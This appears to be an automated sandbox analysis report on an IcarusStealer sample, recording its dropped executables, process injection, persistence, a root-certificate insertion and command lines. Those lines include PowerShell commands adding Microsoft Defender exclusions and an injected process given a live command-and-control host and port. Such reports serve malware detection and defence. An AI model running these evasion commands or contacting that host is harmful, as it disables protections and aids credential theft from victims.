Malware Analysis Report

2024-08-06 08:22

Sample ID 240314-v6f3xsac6t
Target custom1.exe
SHA256 13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
Tags
icarusstealer persistence stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

Threat Level: Known bad

The file custom1.exe was found to be: Known bad.

Malicious Activity Summary

icarusstealer persistence stealer

IcarusStealer

Modifies Installed Components in the registry

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Modifies Internet Explorer settings

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Scheduled Task/Job
T1053
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Modify Registry
T1112
Subvert Trust Controls
T1553
Install Root Certificate
T1553.004
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-03-14 17:35

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-14 17:35

Reported

2024-03-14 17:38

Platform

win7-20240221-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\custom1.exe"

Signatures

IcarusStealer

stealer icarusstealer

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\switched.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\switched.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\switched.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\CatRoot\$SXR\Read.txt C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File created C:\Windows\System32\CatRoot\$SXR\$SXR.exe C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File opened for modification C:\Windows\System32\CatRoot\$SXR\$SXR.exe C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File opened for modification C:\Windows\System32\CatRoot\$SXR\Read.txt C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2624 set thread context of 1032 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2084 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 2084 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 2084 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 2084 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 2084 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 2084 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 2084 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 2084 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\custom1.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 2996 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 2996 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 2996 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 2996 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 2996 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 2996 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 2996 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 2996 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 2640 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 2760 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2760 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2760 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2760 wrote to memory of 2580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2760 wrote to memory of 2580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2760 wrote to memory of 2580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2760 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2760 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2760 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2624 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2624 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2624 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2624 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2480 wrote to memory of 2916 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2480 wrote to memory of 2916 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2480 wrote to memory of 2916 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2480 wrote to memory of 2916 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2624 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
PID 2624 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
PID 2624 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
PID 2624 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
PID 2624 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2624 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2624 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2624 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2624 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2624 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 2624 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 2624 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 2624 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\SysWOW64\cmd.exe
PID 2624 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 108 wrote to memory of 2768 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 108 wrote to memory of 2768 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 108 wrote to memory of 2768 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2624 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2624 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2472 wrote to memory of 804 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
PID 2472 wrote to memory of 804 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
PID 2472 wrote to memory of 804 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
PID 2472 wrote to memory of 804 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
PID 2624 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1032 wrote to memory of 1500 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 1032 wrote to memory of 1500 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 1032 wrote to memory of 1500 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 1032 wrote to memory of 1500 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\custom1.exe

"C:\Users\Admin\AppData\Local\Temp\custom1.exe"

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Users\Admin\AppData\Local\Temp\switched.exe

"C:\Users\Admin\AppData\Local\Temp\switched.exe"

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\p2cglymc\p2cglymc.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE43.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD620E4CA7FE54156A29ED1C9529AF5DF.TMP"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

